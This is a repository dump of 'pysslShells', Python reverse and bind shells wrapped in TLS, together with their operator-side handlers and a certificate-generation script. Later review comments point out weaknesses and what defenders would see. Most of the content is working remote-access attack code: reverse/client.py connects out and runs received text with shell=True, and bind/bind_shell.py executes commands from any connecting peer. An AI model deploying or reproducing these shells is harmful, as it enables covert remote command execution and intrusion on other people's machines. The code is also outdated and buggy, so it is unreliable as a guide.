├── README.md
├── bind
    ├── bind_shell.py
    └── connect.py
├── gencrts.sh
└── reverse
    ├── client.py
    └── server.py


/README.md:
--------------------------------------------------------------------------------
# pysslShells
Finally, reverse/bind shells written in python, encrypted with ssl!

### See also:
Password protected ssl shells (sha256 via hashlib):
https://github.com/darkerego/py_password_ssl_shells

### Update (October 28th, 2019)

- Added SSL bindshell and handler!


### Updated (October 25th, 2019)

- Ported server code to python3 (payload works with either python2 or python3)
- Fixed a bunch of errors and glitches
- Better logic for creating and managing ssl keys
- TODO: Write bind shell



Tips are super appreciated ...

BTC:1F48WFsbCBGuYCopXnBaK9tM7A2JhAWEyw

--------------------------------------------------------------------------------
/bind/bind_shell.py:
--------------------------------------------------------------------------------
# TLS bind shell. Listens on the address/port given as argv[1]/argv[2]
# (defaults: 0.0.0.0, i.e. every interface, port 9999) and passes each chunk
# received from the connected peer to os.popen(), replying with the command
# output followed by a "<cwd>> " prompt.
#
# Review notes (all visible in this file):
# - The peer is never authenticated. ssl.wrap_socket() is called without
#   cert_reqs/ca_certs, so no client certificate is requested; whoever completes
#   the handshake gets command execution with this process's privileges.
# - ssl.wrap_socket() is deprecated since Python 3.7 and removed in 3.12, and
#   ssl.PROTOCOL_TLSv1 pins TLS 1.0, itself deprecated (RFC 8996).
# - What a defender sees: a Python process holding a listening socket that
#   speaks TLS 1.0 with the certificate produced by gencrts.sh and spawns shell
#   children through os.popen().
import socket
import os
import sys
import ssl
from sys import exit
# `global` at module scope has no effect; `client` and `sock` only exist once
# they are assigned further down.
global client
global sock


try:
    try:
        port = int(sys.argv[2])
    except:
        # Bare except: a missing or non-numeric argv[2] silently selects 9999.
        port = 9999
    try:
        ip = sys.argv[1]
    except:
        ip = "0.0.0.0"

    host = (ip, port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Certificate and key paths are relative to the current working directory.
    sock = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key', ssl_version=ssl.PROTOCOL_TLSv1)
    sock.bind(host)
    sock.listen(1)

    while True:
        client, addr = sock.accept()
        prompt = os.getcwd() + "> "
        client.send(prompt.encode())
        while True:
            # One recv() of at most 1024 bytes is treated as one whole command.
            cmd = client.recv(1024)
            # Exact match only; 'quit' closes the listener and exits with status 1.
            if cmd.decode('utf-8') == 'quit':
                sock.close()
                exit(1)

            # Peer-supplied text reaches the shell unmodified; os.popen() returns
            # the command's stdout only.
            ter = os.popen(cmd.decode('utf-8'))
            res = ""
            for line in ter:
                res += line
            ret = res + os.getcwd() + "> "
            client.send(ret.encode())
except KeyboardInterrupt:
    try:
        # `client` is unbound if Ctrl-C arrives before the first accept(); the
        # bare except below swallows the resulting NameError.
        client.send(b"\n\nConnection closed... Goodbye...\n")
    except:
        pass
    sock.close()
except socket.error:
    # NOTE(review): raises NameError when the socket error happens before
    # accept() has bound `client` (e.g. while loading the certificate or binding).
    client.close()


--------------------------------------------------------------------------------
/bind/connect.py:
--------------------------------------------------------------------------------
# Operator-side handler for bind_shell.py: opens a TLS connection to a
# hard-coded host/port, sends each line typed on stdin and prints the reply.
#
# Review notes:
# - The port here is 5600 while bind_shell.py defaults to 9999; one of the two
#   has to be changed for the pair to meet.
# - ssl.wrap_socket() is called without ca_certs/cert_reqs, so the server
#   certificate is not validated: the channel is encrypted but the peer is not
#   authenticated, and an on-path party can terminate the TLS session itself.
# - Replies are printed to the terminal as received, without filtering.
import socket
import ssl
import sys
from sys import exit

# Creates the TCP socket, wraps it in TLS 1.0 and stores it in the global `ssls`.
# `wrappedSocket` is a second name for the same object and is not used again.
def socket_create():
    try:
        global host
        global port
        global ssls
        host = '127.0.0.1'
        port = 5600
        s = socket.socket()
        ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Connect to a remote socket
# A failure is only printed; main() still goes on to send_commands().
def socket_connect():
    try:
        global host
        global port
        ssls.connect((host, port))
    except socket.error as msg:
        print("Socket connection error: " + str(msg))


# Read-send-print loop. `conn` is the same object as the global `ssls` (see
# main()), so the 'quit' branch closes one socket twice.
def send_commands(conn):
    while True:
        try:
            cmd = input()
            if cmd == 'quit':
                conn.send(str.encode('quit'))
                conn.close()
                ssls.close()
                sys.exit()
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                # A single recv() of up to 4096 bytes is read per command.
                client_response = str(conn.recv(4096).decode())
                print(client_response, end="")
        except KeyboardInterrupt:
            # The loop is not left here: the next iteration runs on a closed socket.
            conn.send(str.encode('quit'))
            conn.close()

def main():
    socket_create()
    socket_connect()
    send_commands(ssls)


main()

--------------------------------------------------------------------------------
/gencrts.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Generate keys for ssl socket
# Creates ./ssl relative to the current directory. The Python listeners load
# ../ssl/server.crt and ../ssl/server.key, so this presumably runs from the
# repository root and the listeners from bind/ or reverse/ (confirm).
test -d ssl|| mkdir ssl >/dev/null 2>&1

# 2048-bit RSA key encrypted with 3DES; openssl prompts for the passphrase.
openssl genrsa -des3 -out ssl/server.orig.key 2048
# Writes a copy of the key without the passphrase. ssl/server.key, the file the
# listeners load, is therefore stored unencrypted; no permissions are set here.
openssl rsa -in ssl/server.orig.key -out ssl/server.key
# Certificate signing request for that key (openssl prompts for the subject).
openssl req -new -key ssl/server.key -out ssl/server.csr
# Self-signed certificate valid for 365 days. None of the Python clients in this
# repository loads or pins it, so it provides encryption but no peer identity.
openssl x509 -req -days 365 -in ssl/server.csr -signkey ssl/server.key -out ssl/server.crt

exit

--------------------------------------------------------------------------------
/reverse/client.py:
--------------------------------------------------------------------------------
"""
PySslShell Client - Python2/3 Compatible
Author: Darkerego
"""

# Review notes:
# - This is the executing side of the reverse shell: it connects out to a
#   hard-coded host/port and runs whatever the listener sends with shell=True.
# - ssl.wrap_socket() is called without ca_certs/cert_reqs, so the listener's
#   certificate is not validated; any endpoint answering on that address can
#   issue commands.
# - ssl.wrap_socket() is deprecated since Python 3.7 and removed in 3.12, and
#   ssl.PROTOCOL_TLSv1 pins the deprecated TLS 1.0.
# - What a defender sees: an outbound TLS 1.0 session to port 9999 from a Python
#   process that spawns shell children.
import os
import socket
import subprocess
import ssl
from sys import exit

# Create a socket
# The TLS-wrapped socket is stored in the global `ssls`; `wrappedSocket` is a
# second name for the same object and is not used again.
def socket_create():
    try:
        global host
        global port
        global ssls
        host = '127.0.0.1'
        port = 9999
        s = socket.socket()
        ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Connect to a remote socket
# `global s` is declared but `s` is never assigned or read in this function.
def socket_connect():
    try:
        global host
        global port
        global s
        ssls.connect((host, port))
    except socket.error as msg:
        print("Socket connection error: " + str(msg))


# Receive commands from remote server and run on local machine
def receive_commands():
    global s
    while True:
        try:
            # One recv() of at most 1024 bytes is treated as one whole command.
            data = ssls.recv(1024)
            if data[:].decode("utf-8") == 'quit':
                ssls.close()
                exit(0)
            # 'cd' changes this process's working directory; the same text is
            # then also handed to the shell below. An os.chdir() failure is not
            # caught by the KeyboardInterrupt handler.
            if data[:2].decode("utf-8") == 'cd':
                os.chdir(data[3:].decode("utf-8"))
            if len(data) > 0:
                # Received text reaches the shell unmodified (shell=True).
                cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                # stdout is read to EOF before stderr is read.
                output_bytes = cmd.stdout.read() + cmd.stderr.read()
                output_str = output_bytes.decode('utf-8')
                try:
                    ssls.send(str.encode(output_str + str(os.getcwd()) + '> '))
                except TypeError:
                    output_str = str(output_bytes)  # For Python2 compatibility
                    ssls.send(str.encode(output_str + str(os.getcwd()) + '> '))
        except KeyboardInterrupt:
            ssls.close()
            exit(0)


def main():
    socket_create()
    socket_connect()
    receive_commands()


main()

--------------------------------------------------------------------------------
/reverse/server.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# PySslShell Reverse Shell Server ~ Author: Darkerego
#
# Review notes:
# - Listener for reverse/client.py: binds every interface (host '') on port
#   9999, accepts one connection and relays lines typed on stdin to it.
# - The connecting client is not authenticated (no cert_reqs/ca_certs), and its
#   replies are printed to the operator's terminal as received, unfiltered.
# - ssl.wrap_socket() is deprecated since Python 3.7 and removed in 3.12, and
#   ssl.PROTOCOL_TLSv1 pins the deprecated TLS 1.0.
import socket
import sys
import ssl
# Module-level `cmd` is not read anywhere below; send_commands() uses a local.
cmd = ""


# Creates the socket and wraps it in TLS using ../ssl/server.crt and
# ../ssl/server.key (paths relative to the current working directory).
def socket_create():
    try:
        global host
        global port
        global s
        host = ''
        port = 9999
        s = socket.socket()
        s = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key', ssl_version=ssl.PROTOCOL_TLSv1)
    except socket.error as msg:
        print("Socket creation error: " + str(msg))


# Bind socket to port (the host and port the communication will take place) and wait for connection from client
def socket_bind():
    try:
        global host
        global port
        global s
        print("Binding socket to port: " + str(port))
        try:
            s.bind((host, port))
        except OSError:
            # Every OSError from bind() is reported as "address in use",
            # whatever the real cause. `exit` is not imported in this file, so
            # this relies on the builtin that the site module provides.
            print('Address already in use, quitting...')
            exit(1)
        else:
            s.listen(5)
    except socket.error as msg:
        # On Python 3 socket.error is an alias of OSError, so a bind() failure is
        # already handled by the inner except; this branch retries recursively.
        print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
        socket_bind()


# Establish connection with client (socket must be listening for them)
# Only the first inbound connection is served; its address is printed.
def socket_accept():
    conn, address = s.accept()
    print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1]))
    send_commands(conn)
    conn.close()


# Send commands
def send_commands(conn):
    while True:
        try:
            cmd = input()
            if cmd == 'quit':
                conn.send(str.encode('quit'))
                conn.close()
                s.close()
                sys.exit()
            if len(str.encode(cmd)) > 0:
                conn.send(str.encode(cmd))
                # A single recv() of up to 1024 bytes is read per command, so
                # longer output is only picked up on later iterations.
                client_response = str(conn.recv(1024).decode())
                print(client_response, end="")
        except KeyboardInterrupt:
            # The loop is not left here: the next iteration runs on a closed socket.
            conn.send(str.encode('quit'))
            conn.close()



def main():
    socket_create()
    socket_bind()
    socket_accept()


main()

--------------------------------------------------------------------------------